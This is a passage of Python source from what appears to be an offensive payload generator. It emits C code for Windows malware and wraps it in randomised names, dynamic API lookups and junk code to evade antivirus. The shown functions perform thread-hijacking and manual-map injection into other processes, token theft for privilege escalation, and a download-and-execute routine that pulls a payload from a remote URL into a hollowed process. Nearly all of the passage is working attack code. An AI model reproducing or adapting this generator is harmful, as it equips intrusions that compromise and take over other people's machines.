NdcThread32Next = varname_creator()
NdcOpenThread = varname_creator()
NdcSuspendThread = varname_creator()
NdcGetThreadContext = varname_creator()
NdcSetThreadContext = varname_creator()
NdcResumeThread = varname_creator()
#NdcTl32Snapshot = varname_creator()
#Ret_code += "HANDLE " + User32 + " = GetModuleHandle(\"user32.dll\");\n"
Ret_code += "FARPROC " + NdcThread32First + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Thread32First\");\n"
Ret_code += "FARPROC " + NdcThread32Next + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Thread32Next\");\n"
Ret_code += "FARPROC " + NdcOpenThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"OpenThread\");\n"
Ret_code += RandThreadsnapshot + " = (HANDLE)" + NdcTl32Snapshot + "(TH32CS_SNAPTHREAD,0);\n"
Ret_code += "if(" + RandThreadsnapshot + " != INVALID_HANDLE_VALUE){\n"
Ret_code += "if(!" + NdcThread32First + "(" + RandThreadsnapshot + ",&" + RandTentry + ")){ CloseHandle(" + RandThreadsnapshot + ");}\n"
Ret_code += "do{\n"
Ret_code += "if(" + RandTentry + ".th32OwnerProcessID == " + Randentry + ".th32ProcessID){\n"
Ret_code += "HANDLE " + RandTargetThread + " = (HANDLE)" + NdcOpenThread + "(THREAD_SUSPEND_RESUME|THREAD_SET_CONTEXT|THREAD_GET_CONTEXT,FALSE," + RandTentry + ".th32ThreadID);\n"
Ret_code += "if(" + RandTargetThread + " != NULL){\n"
Ret_code += "CONTEXT " + RandContext + ";\n"
Ret_code += "PVOID " + RandRemCtx + " = NULL;\n"
Ret_code += "PVOID " + RandRemStack + " = NULL;\n"
Ret_code += "FARPROC " + NdcSuspendThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"SuspendThread\");\n"
Ret_code += "if(" + NdcSuspendThread + "(" + RandTargetThread + ") != -1){\n"
Ret_code += RandContext + ".ContextFlags = CONTEXT_FULL;\n"
Ret_code += "FARPROC " + NdcGetThreadContext + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"GetThreadContext\");\n"
Ret_code += "if(" + NdcGetThreadContext + "(" + RandTargetThread + ",&" + RandContext + ")){\n"
#Ret_code += "FARPROC " + NdcVirtualAllocEx + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"VirtualAllocEx\");\n"
Ret_code += RandRemCtx + " = (LPVOID)" + NdcVirtualAllocEx + "(" + RandhProcess + ", NULL,sizeof(" + RandContext + "),MEM_COMMIT,PAGE_READWRITE);\n"
#Ret_code += "FARPROC " + NdcWriteProcessMemory + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"WriteProcessMemory\");\n"
Ret_code += NdcWriteProcessMemory + "(" + RandhProcess + "," + RandRemCtx + ",&" + RandContext + ",sizeof(" + RandContext + "),NULL);\n"
if ModOpt["Arch"] == "x86":
Ret_code += RandContext + ".Eip = (DWORD)" + Randlpv2 + " + " + RandLoaderOffset + ";\n" # GIUSTO??
elif ModOpt["Arch"] == "x64":
Ret_code += RandContext + ".Rip = (DWORD64)" + Randlpv2 + " + " + RandLoaderOffset + ";\n"
Ret_code += RandContext + ".Rcx = (DWORD64)" + RandRemCtx + ";\n"
Ret_code += NdcWriteProcessMemory + "(" + RandhProcess + ",(LPVOID)(((LPBYTE)" + Randlpv2 + ")+2),&" + RandContext + ".Rcx,sizeof(" + RandContext + ".Rcx),NULL);\n"
#let stack have some room to grow up or down
Ret_code += RandContext + ".Rsp = " + RandContext + ".Rsp - 0x2000;\n"
Ret_code += "FARPROC " + NdcSetThreadContext + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"SetThreadContext\");\n"
Ret_code += NdcSetThreadContext + "(" + RandTargetThread + ",&" + RandContext + ");\n"
Ret_code += "FARPROC " + NdcResumeThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"ResumeThread\");\n"
Ret_code += NdcResumeThread + "(" + RandTargetThread + ");\n"
Ret_code += "break;"
Ret_code += "}}}}}while(Thread32Next(" + RandThreadsnapshot + ",&" + RandTentry + "));}\n"
else:
Ret_code += RandThreadsnapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD,0);\n"
Ret_code += "if(" + RandThreadsnapshot + " != INVALID_HANDLE_VALUE){\n"
Ret_code += "if(!Thread32First(" + RandThreadsnapshot + ",&" + RandTentry + ")){ CloseHandle(" + RandThreadsnapshot +");}\n"
Ret_code += "do{\n"
Ret_code += "if(" + RandTentry + ".th32OwnerProcessID == " + Randentry + ".th32ProcessID){\n"
Ret_code += "HANDLE " + RandTargetThread + " = OpenThread(THREAD_SUSPEND_RESUME|THREAD_SET_CONTEXT|THREAD_GET_CONTEXT,FALSE," + RandTentry + ".th32ThreadID);\n"
Ret_code += "if(" + RandTargetThread + " != NULL){\n"
Ret_code += "CONTEXT " + RandContext + ";\n"
Ret_code += "PVOID " + RandRemCtx + " = NULL;\n"
Ret_code += "PVOID " + RandRemStack + " = NULL;\n"
Ret_code += "if(SuspendThread(" + RandTargetThread + ") != -1){\n"
Ret_code += RandContext + ".ContextFlags = CONTEXT_FULL;\n"
Ret_code += "if(GetThreadContext(" + RandTargetThread + ",&" + RandContext + ")){\n"
Ret_code += RandRemCtx + " = VirtualAllocEx(" + RandhProcess + ", NULL,sizeof(" + RandContext + "),MEM_COMMIT,PAGE_READWRITE);\n"
Ret_code += "WriteProcessMemory(" + RandhProcess + "," + RandRemCtx + ",&" + RandContext + ",sizeof(" + RandContext + "),NULL);\n"
if ModOpt["Arch"] == "x86":
Ret_code += RandContext + ".Eip = (DWORD)" + Randlpv2 + " + " + RandLoaderOffset + ";\n" # GIUSTO??
elif ModOpt["Arch"] == "x64":
Ret_code += RandContext + ".Rip = (DWORD64)" + Randlpv2 + " + " + RandLoaderOffset + ";\n"
Ret_code += RandContext + ".Rcx = (DWORD64)" + RandRemCtx + ";\n"
Ret_code += "WriteProcessMemory(" + RandhProcess + ",(LPVOID)(((LPBYTE)" + Randlpv2 + ")+2),&" + RandContext + ".Rcx,sizeof(" + RandContext + ".Rcx),NULL);\n"
#let stack have some room to grow up or down
Ret_code += RandContext + ".Rsp = " + RandContext + ".Rsp - 0x2000;\n"
Ret_code += "SetThreadContext(" + RandTargetThread + ",&" + RandContext + ");\n"
Ret_code += "ResumeThread(" + RandTargetThread + ");\n"
Ret_code += "break;"
Ret_code += "}}}}}while(Thread32Next(" + RandThreadsnapshot + ",&" + RandTentry + "));}\n"
else:
if ModOpt["DynImport"] == True:
NdcCreateRemoteThread = varname_creator()
Ret_code += "FARPROC " + NdcCreateRemoteThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"CreateRemoteThread\");\n"
Ret_code += "HANDLE " + RandhThread + " = (HANDLE)" + NdcCreateRemoteThread + "(" + RandhProcess + ", NULL,1024*1024,(LPTHREAD_START_ROUTINE)((ULONG_PTR)" + Randlpv2 + " + " + RandLoaderOffset + "),NULL,0,NULL);\n"
else:
Ret_code += "HANDLE " + RandhThread + " = CreateRemoteThread(" + RandhProcess + ", NULL,1024*1024,(LPTHREAD_START_ROUTINE)((ULONG_PTR)" + Randlpv2 + " + " + RandLoaderOffset + "),NULL,0,NULL);\n"
elif ModOpt["ExecMethod"] in ["ManualMap","MM"]:
NdcVirtualAllocEx = varname_creator()
NdcWriteProcessMemory = varname_creator()
Ret_code += "PIMAGE_DOS_HEADER " + RandImgDosHeader + ";\n"
Ret_code += "PIMAGE_NT_HEADERS " + RandImgNTHeader + ";\n"
Ret_code += "PIMAGE_SECTION_HEADER " + RandImgSectHeader + ";\n"
Ret_code += "HANDLE " + RandhThread + ";\n"
Ret_code += "LPVOID " + Randlpv2 + "," + RandLoaderMem + ";\n"
Ret_code += "DWORD " + Randflag + ";\n"
Ret_code += RandLoadStruct + " " + RandPtrLoader+ ";\n"
Ret_code += RandImgDosHeader + "=(PIMAGE_DOS_HEADER)" + Randlpv + ";\n"
Ret_code += RandImgNTHeader + "=(PIMAGE_NT_HEADERS)((LPBYTE)" + Randlpv + " + " + RandImgDosHeader + "->e_lfanew);\n"
Ret_code += "if((" + RandImgNTHeader + "->FileHeader.Characteristics & IMAGE_FILE_DLL)){\n"
if ModOpt["DynImport"] == True:
Ret_code += "FARPROC " + NdcVirtualAllocEx + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"VirtualAllocEx\");\n"
Ret_code += "FARPROC " + NdcWriteProcessMemory + " = GetProcAddress(" + ModOpt["NtdllHandle"] + ", \"WriteProcessMemory\");\n"
Ret_code += Randlpv2 + " = (LPVOID)" + NdcVirtualAllocEx + "(" + RandhProcess + ",(LPVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase), " + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n"
Ret_code += "if(" + Randlpv2 + " == NULL){\n"
Ret_code += Randlpv2 + " = (LPVOID)" + NdcVirtualAllocEx + "(" + RandhProcess + ",NULL," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}\n"
Ret_code += NdcWriteProcessMemory + "(" + RandhProcess + "," + Randlpv2 + "," + Randlpv + "," + RandImgNTHeader + "->OptionalHeader.SizeOfHeaders,NULL);\n"
Ret_code += RandImgSectHeader + " = (PIMAGE_SECTION_HEADER)(" + RandImgNTHeader + "+1);\n"
Ret_code += "for(" + Randflag + "=0;" + Randflag + "<" + RandImgNTHeader + "->FileHeader.NumberOfSections;" + Randflag + "++){\n"
Ret_code += NdcWriteProcessMemory + "(" + RandhProcess + ",(LPVOID)((LPBYTE)" + Randlpv2 + "+" + RandImgSectHeader + "[" + Randflag + "].VirtualAddress),(LPVOID)((LPBYTE)" + Randlpv + "+" + RandImgSectHeader + "[" + Randflag + "].PointerToRawData)," + RandImgSectHeader + "[" + Randflag + "].SizeOfRawData,NULL);}\n"
Ret_code += RandLoaderMem + " = (LPVOID)" + NdcVirtualAllocEx + "(" + RandhProcess + ",NULL,4096,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
else:
Ret_code += Randlpv2 + " = VirtualAllocEx(" + RandhProcess + ",(LPVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase), " + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n"
Ret_code += "if(" + Randlpv2 + " == NULL){\n"
Ret_code += Randlpv2 + "=VirtualAllocEx(" + RandhProcess + ",NULL," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}\n"
Ret_code += "WriteProcessMemory(" + RandhProcess + "," + Randlpv2 + "," + Randlpv + "," + RandImgNTHeader + "->OptionalHeader.SizeOfHeaders,NULL);\n"
Ret_code += RandImgSectHeader + "=(PIMAGE_SECTION_HEADER)(" + RandImgNTHeader + "+1);\n"
Ret_code += "for(" + Randflag + "=0;" + Randflag + "<" + RandImgNTHeader + "->FileHeader.NumberOfSections;" + Randflag + "++){\n"
Ret_code += "WriteProcessMemory(" + RandhProcess + ",(LPVOID)((LPBYTE)" + Randlpv2 + "+" + RandImgSectHeader + "[" + Randflag + "].VirtualAddress),(LPVOID)((LPBYTE)" + Randlpv + "+" + RandImgSectHeader + "[" + Randflag + "].PointerToRawData)," + RandImgSectHeader + "[" + Randflag + "].SizeOfRawData,NULL);}\n"
Ret_code += RandLoaderMem + " = VirtualAllocEx(" + RandhProcess + ",NULL,4096,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
Ret_code += "memset(&" + RandPtrLoader+ ",0,sizeof(" + RandLoadStruct + "));\n"
Ret_code += RandPtrLoader+ ".ImageBase=" + Randlpv2 + ";\n"
Ret_code += RandPtrLoader+ ".NtHeaders=(PIMAGE_NT_HEADERS)((LPBYTE)" + Randlpv2 + "+" + RandImgDosHeader + "->e_lfanew);\n"
Ret_code += RandPtrLoader+ ".BaseRelocation=(PIMAGE_BASE_RELOCATION)((LPBYTE)" + Randlpv2 + "+" + RandImgNTHeader + "->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);\n"
Ret_code += RandPtrLoader+ ".ImportDirectory=(PIMAGE_IMPORT_DESCRIPTOR)((LPBYTE)" + Randlpv2 + "+" + RandImgNTHeader + "->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);\n"
Ret_code += RandPtrLoader+ ".fnLoadLibraryA=LoadLibraryA;\n"
Ret_code += RandPtrLoader+ ".fnGetProcAddress=GetProcAddress;\n"
#Ret_code += RandPtrLoader+ ".fnRtlAddFunctionTable=RtlAddFunctionTable;\n"
if ModOpt["DynImport"] == True:
NdcCreateRemoteThread = varname_creator()
NdcWaitForSingleObject = varname_creator()
Ret_code += NdcWriteProcessMemory + "(" + RandhProcess + "," + RandLoaderMem + ",&" + RandPtrLoader+ ",sizeof(" + RandLoadStruct + "),NULL);\n"
Ret_code += NdcWriteProcessMemory + "(" + RandhProcess + ",(LPVOID)((P" + RandLoadStruct + ")" + RandLoaderMem + "+1),LoadDll,(SIZE_T)LoadDllEnd-(SIZE_T)LoadDll,NULL);\n"
Ret_code += "FARPROC " + NdcCreateRemoteThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"CreateRemoteThread\");\n"
Ret_code += RandhThread + " = (HANDLE)" + NdcCreateRemoteThread + "(" + RandhProcess + ",NULL,0,(LPTHREAD_START_ROUTINE)((P" + RandLoadStruct + ")" + RandLoaderMem + "+1)," + RandLoaderMem + ",0,NULL);\n"
Ret_code += "FARPROC " + NdcWaitForSingleObject + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"VirtualAllocEx\");\n"
Ret_code += NdcWaitForSingleObject + "(" + RandhThread + ",-1);}\n"
else:
Ret_code += "WriteProcessMemory(" + RandhProcess + "," + RandLoaderMem + ",&" + RandPtrLoader+ ",sizeof(" + RandLoadStruct + "),NULL);\n"
Ret_code += "WriteProcessMemory(" + RandhProcess + ",(LPVOID)((P" + RandLoadStruct + ")" + RandLoaderMem + "+1),LoadDll,(SIZE_T)LoadDllEnd-(SIZE_T)LoadDll,NULL);\n"
Ret_code += RandhThread + "=CreateRemoteThread(" + RandhProcess + ",NULL,0,(LPTHREAD_START_ROUTINE)((P" + RandLoadStruct + ")" + RandLoaderMem + "+1)," + RandLoaderMem + ",0,NULL);\n"
Ret_code += "WaitForSingleObject(" + RandhThread + ",-1);}\n"
#Ret_code += "DWORD Exitcode;\n"
#Ret_code += "GetExitCodeThread(" + RandhThread + ",&Exitcode);\n"
Ret_code += "}}}}\n"
Ret_code += "$:END\n"
#Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])
Ret_code = JunkInjector(Ret_code,ModOpt["JI"],ModOpt["JF"],ModOpt["EF"],ModOpt["JR"])
if ModOpt["Outformat"] == "exe":
Ret_code += "return 0;}"
elif ModOpt["Outformat"] == "dll":
Ret_code += "}\n"
Ret_code += "return bReturnValue;}\n"
WriteSource("Source.c",Ret_code)
def Privesc_C_DuplicateTokenEx_windows(ModOpt):
Binpath = ModOpt["Binpath"]
Pidtarget = ModOpt["TargetPid"]
Randprochandle = varname_creator()
Randtokenhandle = varname_creator()
RandDuphandle = varname_creator()
Randsi = varname_creator()
Randpi = varname_creator()
Ret_code = ""
IncludeList = [
"#include <windows.h>\n", "#include <stdio.h>\n",
"#include <string.h>\n", "#include <math.h>\n", "#include <time.h>\n"
]
Ret_code += IncludeShuffler(IncludeList)
if ModOpt["Outformat"] == "exe":
Ret_code += "int main(int argc,char * argv[]){\n"
elif ModOpt["Outformat"] == "dll":
if ModOpt["Reflective"] == True:
Ret_code += "#include \"ReflectiveLoader.h\"\n"
Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
Ret_code += "BOOL bReturnValue = TRUE;\n"
Ret_code += "if(dwReason == DLL_PROCESS_ATTACH){\n"
if ModOpt["DynImport"] == True:
ModOpt["NtdllHandle"] = varname_creator()
ModOpt["Ker32Handle"] = varname_creator()
Ret_code += "HANDLE " + ModOpt[
"NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
Ret_code += "HANDLE " + ModOpt[
"Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
Ret_code += "$:START\n"
Ret_code += WindowsDefend(ModOpt)
#Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])
if ModOpt["DynImport"] == True:
ModOpt["NtdllHandle"] = varname_creator()
ModOpt["Ker32Handle"] = varname_creator()
ModOpt["AdvapiHandle"] = varname_creator()
Ret_code += "HANDLE " + ModOpt[
"NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
Ret_code += "HANDLE " + ModOpt[
"Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
Ret_code += "HANDLE " + ModOpt[
"AdvapiHandle"] + " = GetModuleHandle(\"advapi32.dll\");\n"
Ret_code += "$:EVA\n"
Ret_code += "HANDLE " + Randtokenhandle + " = NULL;\n"
Ret_code += "HANDLE " + RandDuphandle + " = NULL;\n"
Ret_code += "STARTUPINFOW " + Randsi + ";\n"
Ret_code += "PROCESS_INFORMATION " + Randpi + ";\n"
Ret_code += "ZeroMemory(&" + Randsi + ", sizeof(STARTUPINFOW));\n"
Ret_code += "ZeroMemory(&" + Randpi + ", sizeof(PROCESS_INFORMATION));\n"
Ret_code += Randsi + ".cb = sizeof(STARTUPINFO);\n"
if ModOpt["DynImport"] == True:
NdcOP = varname_creator()
NdcOPT = varname_creator()
NdcDTE = varname_creator()
NdcCPWTW = varname_creator()
Ret_code += "FARPROC " + NdcOP + " = GetProcAddress(" + ModOpt[
"Ker32Handle"] + ",\"OpenProcess\");\n"
Ret_code += "FARPROC " + NdcOPT + " = GetProcAddress(" + ModOpt[
"AdvapiHandle"] + ",\"OpenProcessToken\");\n"
Ret_code += "FARPROC " + NdcDTE + " = GetProcAddress(" + ModOpt[
"AdvapiHandle"] + ",\"DuplicateTokenEx\");\n"
Ret_code += "FARPROC " + NdcCPWTW + " = GetProcAddress(" + ModOpt[
"AdvapiHandle"] + ",\"CreateProcessWithTokenW\");\n"
Ret_code += "HANDLE " + Randprochandle + " = " + NdcOP + "(PROCESS_ALL_ACCESS,TRUE," + Pidtarget + ");\n"
Ret_code += NdcOPT + "(" + Randprochandle + ", TOKEN_ALL_ACCESS, &" + Randtokenhandle + ");\n"
Ret_code += NdcDTE + "(" + Randtokenhandle + ", TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &" + RandDuphandle + ");\n"
Ret_code += NdcCPWTW + "(" + RandDuphandle + ", LOGON_WITH_PROFILE, NULL,\"" + Binpath + "\", 0, NULL, NULL, &" + Randsi + ", &" + Randpi + ");\n"
else:
Ret_code += "HANDLE " + Randprochandle + " = OpenProcess(PROCESS_ALL_ACCESS,TRUE," + Pidtarget + ");\n"
Ret_code += "OpenProcessToken(" + Randprochandle + ", TOKEN_ALL_ACCESS, &" + Randtokenhandle + ");\n"
Ret_code += "DuplicateTokenEx(" + Randtokenhandle + ", TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &" + RandDuphandle + ");\n"
Ret_code += "CreateProcessWithTokenW(" + RandDuphandle + ", LOGON_WITH_PROFILE, NULL,L\"" + Binpath + "\", 0, NULL, NULL, &" + Randsi + ", &" + Randpi + ");\n"
Ret_code += "$:END\n"
#Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])
Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"],
False)
if ModOpt["Outformat"] == "exe":
Ret_code += "return 0;}"
elif ModOpt["Outformat"] == "dll":
Ret_code += "}\n"
Ret_code += "return bReturnValue;}\n"
WriteSource("Source.c", Ret_code)
def DownloadExecExe_C_windows(ModOpt):
UrlTarget = ModOpt["UrlTarget"]
Filesize = ModOpt["Filesize"]
RandvarFsize = varname_creator()
Randsi = varname_creator()
Randpi = varname_creator()
RandTcontext = varname_creator()
Randlpv = varname_creator()
Randpointer = varname_creator()
RandhInternet = varname_creator()
RandhURL = varname_creator()
RandvarBRead = varname_creator()
RandvarBWritten = varname_creator()
RandisRead = varname_creator()
RandImgDosHeader = varname_creator()
RandImgNTHeader = varname_creator()
RandImgSectHeader = varname_creator()
NdcNtUnmapViewofSection = varname_creator()
RandlpProcImgBAddr = varname_creator()
RandlpNewImgBAddr = varname_creator()
RandrelocData = varname_creator()
RandDelta = varname_creator()
Randflag = varname_creator()
Randflag2 = varname_creator()
Randflag3 = varname_creator()
RandSectName = varname_creator()
RandRelocSectRawData = varname_creator()
RandOffsetInRelocSect = varname_creator()
RandEntryCount = varname_creator()
RandPBlocks = varname_creator()
RandFieldAddr = varname_creator()
RandDwBuff = varname_creator()
RandlOldProtect = varname_creator()
RandlNewProtect = varname_creator()
ModOpt["Lpvoid"] = Randlpv
CryptFile(ModOpt)
Ret_code = ""
IncludeList = ["#include <stdlib.h>\n","#include <windows.h>\n","#include <stdio.h>\n","#include <string.h>\n","#include <time.h>\n","#include <math.h>\n"]
Ret_code += IncludeShuffler(IncludeList)
Ret_code += "#include <tlhelp32.h>\n"
Ret_code += "#include <wininet.h>\n"
#if ModOpt["ExecMethod"] in ["Chimera","C"]:
#Ret_code += "#define CountRelocationEntries(dwBlockSize) (dwBlockSize - sizeof(BASE_RELOCATION_BLOCK)) / sizeof(BASE_RELOCATION_ENTRY)\n"
if ModOpt["Outformat"] == "exe":
Ret_code += "int main(int argc,char * argv[]){\n"
elif ModOpt["Outformat"] == "dll":
Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
Ret_code += "BOOL bReturnValue = TRUE;\n"
Ret_code += "if(dwReason == DLL_PROCESS_ATTACH){\n"
Ret_code += "$:START\n"
Ret_code += WindowsDefend(ModOpt)
#Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])
Ret_code += "$:EVA\n"
Ret_code += "STARTUPINFOA " + Randsi + ";\n"
Ret_code += "PROCESS_INFORMATION " + Randpi + ";\n"
Ret_code += "ZeroMemory(&" + Randsi + ", sizeof(" + Randsi + "));\n"
Ret_code += Randsi + ".cb = sizeof(" + Randsi + ");\n"
Ret_code += "ZeroMemory(&" + Randpi + ", sizeof(" + Randpi + "));\n"
if ModOpt["DynImport"] == True:
ModOpt["NtdllHandle"] = varname_creator()
ModOpt["Ker32Handle"] = varname_creator()
Wininet = varname_creator()
Ret_code += "HANDLE " + ModOpt["NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
Ret_code += "HANDLE " + ModOpt["Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
Ret_code += "HANDLE " + Wininet + " = GetModuleHandle(\"wininet.dll\");\n"
if ModOpt["ExecMethod"] in ["Chimera","C"]:
RandhProcess = varname_creator()
Randentry = varname_creator()
RandProcsnapshot = varname_creator()
Randlpv2 = varname_creator()
Ret_code += "PROCESSENTRY32 " + Randentry + ";\n"
Ret_code += Randentry + ".dwSize = sizeof(PROCESSENTRY32);\n"
if ModOpt["DynImport"] == True:
NdcTl32Snapshot = varname_creator()
NdcProcess32First = varname_creator()
NdcProcess32Next = varname_creator()
NdcOpenProcess = varname_creator()
Ret_code += "FARPROC " + NdcTl32Snapshot + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"CreateToolhelp32Snapshot\");\n"
Ret_code += "HANDLE " + RandProcsnapshot + " = (HANDLE)" + NdcTl32Snapshot + "(TH32CS_SNAPPROCESS, 0);\n"
Ret_code += "FARPROC " + NdcProcess32First + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Process32First\");\n"
Ret_code += "FARPROC " + NdcProcess32Next + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Process32Next\");\n"
Ret_code += "FARPROC " + NdcOpenProcess + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"OpenProcess\");\n"
Ret_code += "if (" + NdcProcess32First + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
Ret_code += "while (" + NdcProcess32Next + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
Ret_code += "if(strcmp(" + Randentry + ".szExeFile, \"" + ModOpt["ProcTarget"] + "\") == 0){\n"
Ret_code += "HANDLE " + RandhProcess + " = (HANDLE)" + NdcOpenProcess + "(PROCESS_ALL_ACCESS, FALSE, " + Randentry + ".th32ProcessID);\n"
else:
Ret_code += "HANDLE " + RandProcsnapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\n"
Ret_code += "if (Process32First(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
Ret_code += "while (Process32Next(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
Ret_code += "if(strcmp(" + Randentry + ".szExeFile, \"" + ModOpt["ProcTarget"] + "\") == 0){\n"
Ret_code += "HANDLE " + RandhProcess + " = OpenProcess(PROCESS_ALL_ACCESS, FALSE, " + Randentry + ".th32ProcessID);\n"
elif ModOpt["ExecMethod"] == "ProcessHollowing" or ModOpt["ExecMethod"] == "PH":
if ModOpt["DynImport"] == True:
NdcCreateProcessA = varname_creator()
Ret_code += "FARPROC " + NdcCreateProcessA + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"CreateProcessA\");\n"
Ret_code += NdcCreateProcessA + "(0,\"" + ModOpt["ProcTarget"] + "\",0,0,0, CREATE_SUSPENDED,0,0,&" + Randsi + ",&" + Randpi + ");\n"
else:
Ret_code += "CreateProcessA(0,\"" + ModOpt["ProcTarget"] + "\",0,0,0, CREATE_SUSPENDED,0,0,&" + Randsi + ",&" + Randpi + ");\n"
Ret_code += "CONTEXT " + RandTcontext + ";\n"
Ret_code += RandTcontext + ".ContextFlags = CONTEXT_FULL;\n"
if ModOpt["DynImport"] == True:
NdcGetThreadContext = varname_creator()
Ret_code += "FARPROC " + NdcGetThreadContext + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"GetThreadContext\");\n"
Ret_code += "if (" + NdcGetThreadContext + "(" + Randpi + ".hThread,&" + RandTcontext + ") != 0){\n"
else:
Ret_code += "if (GetThreadContext(" + Randpi + ".hThread,&" + RandTcontext + ") != 0){\n"
Ret_code += "int " + RandvarFsize + " = " + ModOpt["Filesize"] + ";\n"
Ret_code += "DWORD " + RandvarBWritten + " = 0;\n"
if ModOpt["DynImport"] == True:
NdcInternetOpenA = varname_creator()
NdcInternetOpenUrl = varname_creator()
NdcVirtualAlloc = varname_creator()
NdcInternetReadFile = varname_creator()
Ret_code += "FARPROC " + NdcInternetOpenA + " = GetProcAddress(" + Wininet + ", \"InternetOpenA\");\n"
Ret_code += "HINTERNET " + RandhInternet + " = (HINTERNET)" + NdcInternetOpenA + "(\"Mozilla/4.0\", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n"
Ret_code += "if (" + RandhInternet + " != NULL){\n"
Ret_code += "FARPROC " + NdcInternetOpenUrl + " = GetProcAddress(" + Wininet + ", \"InternetOpenUrl\");\n"
Ret_code += "HINTERNET " + RandhURL + " = (HINTERNET)" + NdcInternetOpenUrl + "(" + RandhInternet + ",\"" + UrlTarget + "\",NULL, 0,INTERNET_FLAG_RESYNCHRONIZE, 0);\n"
Ret_code += "FARPROC " + NdcVirtualAlloc + " = GetProcAddress(" + Wininet + ", \"VirtualAlloc\");\n"
Ret_code += "unsigned char * " + Randlpv + " = (LPVOID)" + NdcVirtualAlloc + "(0," + RandvarFsize + ", MEM_COMMIT, PAGE_READWRITE);\n"
Ret_code += "ZeroMemory(" + Randlpv + "," + RandvarFsize + ");\n"
Ret_code += "char * " + Randpointer + " = " + Randlpv + ";\n"
Ret_code += "DWORD " + RandvarBRead + ";\n"
Ret_code += "do{\n"
Ret_code += "FARPROC " + NdcInternetReadFile + " = GetProcAddress(" + Wininet + ", \"InternetReadFile\");\n"
Ret_code += "BOOL " + RandisRead + " = " + NdcInternetReadFile + "(" + RandhURL + "," + Randpointer + ", 1024, &" + RandvarBRead + ");\n"
else:
Ret_code += "HINTERNET " + RandhInternet + " = InternetOpenA(\"Mozilla/4.0\", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n"
Ret_code += "if (" + RandhInternet + " != NULL){\n"
Ret_code += "HINTERNET " + RandhURL + " = InternetOpenUrl(" + RandhInternet + ",\"" + UrlTarget + "\",NULL, 0,INTERNET_FLAG_RESYNCHRONIZE, 0);\n"
Ret_code += "unsigned char * " + Randlpv + " = VirtualAlloc(0," + RandvarFsize + ", MEM_COMMIT, PAGE_READWRITE);\n"
Ret_code += "ZeroMemory(" + Randlpv + "," + RandvarFsize + ");\n"
Ret_code += "char * " + Randpointer + " = " + Randlpv + ";\n"
Ret_code += "DWORD " + RandvarBRead + ";\n"
Ret_code += "do{\n"
Ret_code += "BOOL " + RandisRead + " = InternetReadFile(" + RandhURL + "," + Randpointer + ", 1024, &" + RandvarBRead + ");\n"
Ret_code += Randpointer + " += " + RandvarBRead + ";\n"
Ret_code += "}while(" + RandvarBRead + " > 0);\n"
if ModOpt["Decoder"] != "False":
Ret_code += ModOpt["Decoder"]
Ret_code += "typedef struct BASE_RELOCATION_BLOCK {"
Ret_code += "DWORD PageAddress;"
Ret_code += "DWORD BlockSize;"
Ret_code += "} BASE_RELOCATION_BLOCK, *PBASE_RELOCATION_BLOCK;\n"
Ret_code += "typedef struct BASE_RELOCATION_ENTRY {"
